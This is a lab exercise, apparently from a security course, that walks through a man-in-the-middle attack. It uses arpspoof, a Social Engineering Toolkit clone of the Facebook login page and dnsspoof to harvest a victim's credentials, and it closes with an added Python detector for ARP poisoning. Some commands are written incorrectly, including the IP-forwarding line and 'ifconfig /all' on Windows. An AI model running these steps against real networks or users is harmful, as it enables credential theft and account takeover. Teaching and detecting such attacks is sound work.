Question
MITM requires 3 separate entities: the attacker, the victim, and the web server. Since this is a lab, there are multiple controlled variables, e.g. the attacker and victim reside on the same LAN subnet with a single gateway. Hence, we only need to spoof the victim and the gateway.
This lab will be run on Kali and Windows simultaneously. The Kali user is the attacker and the Windows user is the victim.
Note: Both these systems reside on the same LAN subnet for the pedagogical purpose of this lab.
- Retrieve the IP addresses of the Windows machine (victim/client) and the web server.
- Open Command Prompt and type "ifconfig /all". Note down the MAC and IP address.
Would the attack work if the URL is secured? HTTP vs. HTTPS?
Note: you can include any valid website address.
- Switch to Kali.
- Open three Terminal windows to make the victim believe we are the web server and the server believe we are the victim. Terminal can be found on the dock to the left by default.
- Enable IP forwarding - type "echo >1 /proc/sys/ipv4/ip_forward"
Would we achieve the results without "ip_forward"? Why/why not?
- Use the "arpspoof" command:
Note: I have used the IP addresses of the web server and the victim's machine for explanation purposes only. Make sure to input the actual IP addresses of the victim and web server respectively.
- Arpspoof victim to server - type in "arpspoof 192.168.1.15 192.168.1.1"; .15 belongs to the victim and .1 belongs to the server.
- Arpspoof server to victim - "arpspoof 192.168.1.1 192.168.1.15".
- Executing these commands enables the switch, making the victim believe YOU, this host, the attacker, are the server, and the server believe YOU are the victim (its client).
Upload a screenshot after executing the "arpspoof" command to show the swap of the victim's and server's addresses.
- Now, we will make a temporary server with the help of the Social Engineering Toolkit.
- Open a fresh terminal window, type in "setoolkit" to load the Social Engineering Toolkit, and press Enter.
Note: If this is your first time loading or using SET, you will have to accept the Terms and Conditions. To do so, type in "y" upon prompt.
To select any of the attacks/tools, press the corresponding number followed by the Enter key.
- In this lab, we will be using "Social-Engineering Attacks". Type "1" and press Enter as shown below.
- Next, select "Website Attack Vectors". Type "2" and press Enter.
- Next, select "Credential Harvester Attack Method". Type "3" and press Enter.
- Next, select "Site Cloner". Type "2" and press Enter.
- The system will prompt you for an IP address. Enter your (the attacker's) IP address, followed by the website you would like to clone. In this case it is 192.168.1.18.
- We chose Facebook, but in reality the attacker can choose any website, preferably one with username and password fields on the homepage.
- Once you press Enter, SET will start cloning the login page of that website. Your screen should look similar to the screenshot below. Note: While operating SET, at any time you wish to go back or restart SET, input "99".
Now that we have set up a temporary web server cloning the desired webpage, we can spoof DNS to carry out a stealthy attack. DNS spoofing will enable the attacker to rename the cloned site to an appealing name, which helps deceive the victim into opening that webpage and entering their credentials. In other words, asking the victim to open 192.168.1.18 (the attacker's IP) would result in getting caught. Instead, the attacker asks the victim to visit a webpage with a name that is different from, yet very close to, the actual site, like "logmein.facebook.com".
- Let's start the DNS spoofing process by creating a text file. To do so, type the following in the terminal and press Enter: "pico hosts.txt"
- It will open a blank page. Type your (the attacker's) IP, followed by a space, followed by the name you wish to give to the cloned (fake) webpage. For example, I used logmein.facebook.com.
- Press "CTRL + X" (Control and X) to save and exit.
- When the system prompts you to save, press "y". You will then be asked several other options, as displayed below. Press Enter to exit the screen.
- Open a fresh terminal window and type the following command to start dnsspoof:
"dnsspoof -i eth0 -f hosts.txt"
- Switch to Windows and open a web browser.
- Navigate to the DNS name you gave to the cloned webpage and log in with valid/invalid credentials.
Note: The reason you can use valid or invalid credentials is that the purpose of this lab is to show you how to get/extract credentials. Since the victim would not know they are being attacked, by default they would enter their valid credentials.
What would happen after you input any (valid/invalid) credentials on the cloned website?
Switch back to Kali.
- You should see the victim's credentials in the terminal window. Now the attacker can log in with those credentials and change the password, preventing the client/victim from getting access.
This scenario facilitated gaining the victim's credentials. What other scenarios can MITM be useful for? Name at least three.
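From the defender's side, the ARP poisoning step above leaves a characteristic trace: a single MAC address starts answering for both the gateway IP and the victim IP, and the gateway's IP-to-MAC binding changes. The following added example (not part of the lab text) models a small host-based detector that walks a log of ARP replies and flags exactly those two conditions; all IPs, MACs and timestamps are constructed sample values.

```python
"""Detect ARP cache poisoning from a log of ARP replies (added example).

Two signals are checked, matching the lab's scenario:
  1. an IP's MAC binding changes after it was first learned (HIGH if it is
     the gateway, since that redirects all off-subnet traffic);
  2. one MAC claims more than one IP (the attacker answering for both the
     gateway and the victim).
"""
from collections import defaultdict

# Constructed sample log: (timestamp, sender_ip, sender_mac) from ARP replies.
ARP_REPLIES = [
    (1, "192.168.1.1", "aa:aa:aa:aa:aa:01"),    # real gateway
    (2, "192.168.1.15", "bb:bb:bb:bb:bb:15"),   # real victim
    (3, "192.168.1.18", "cc:cc:cc:cc:cc:18"),   # a third host
    (10, "192.168.1.1", "cc:cc:cc:cc:cc:18"),   # third host now claims gateway IP
    (11, "192.168.1.15", "cc:cc:cc:cc:cc:18"),  # ...and the victim IP
]


def detect_arp_spoof(replies, gateway_ip):
    """Return a list of (severity, message) alerts for suspicious ARP replies."""
    first_seen = {}                  # ip -> MAC learned first (trusted baseline)
    ips_per_mac = defaultdict(set)   # mac -> set of IPs it has claimed
    alerts = []
    for ts, ip, mac in replies:
        # Signal 1: binding change for an IP we already know.
        if ip in first_seen and first_seen[ip] != mac:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append((sev, f"t={ts}: {ip} changed {first_seen[ip]} -> {mac}"))
        else:
            first_seen.setdefault(ip, mac)
        # Signal 2: the same MAC now claims an additional IP.
        before = len(ips_per_mac[mac])
        ips_per_mac[mac].add(ip)
        if len(ips_per_mac[mac]) > max(1, before):
            claimed = ", ".join(sorted(ips_per_mac[mac]))
            alerts.append(("HIGH", f"t={ts}: {mac} claims multiple IPs: {claimed}"))
    return alerts


if __name__ == "__main__":
    for severity, msg in detect_arp_spoof(ARP_REPLIES, "192.168.1.1"):
        print(f"[{severity}] {msg}")
```

On a real host the same logic can be fed from a periodic `arp -a` (Windows) or `ip neigh` (Linux) snapshot instead of a packet log.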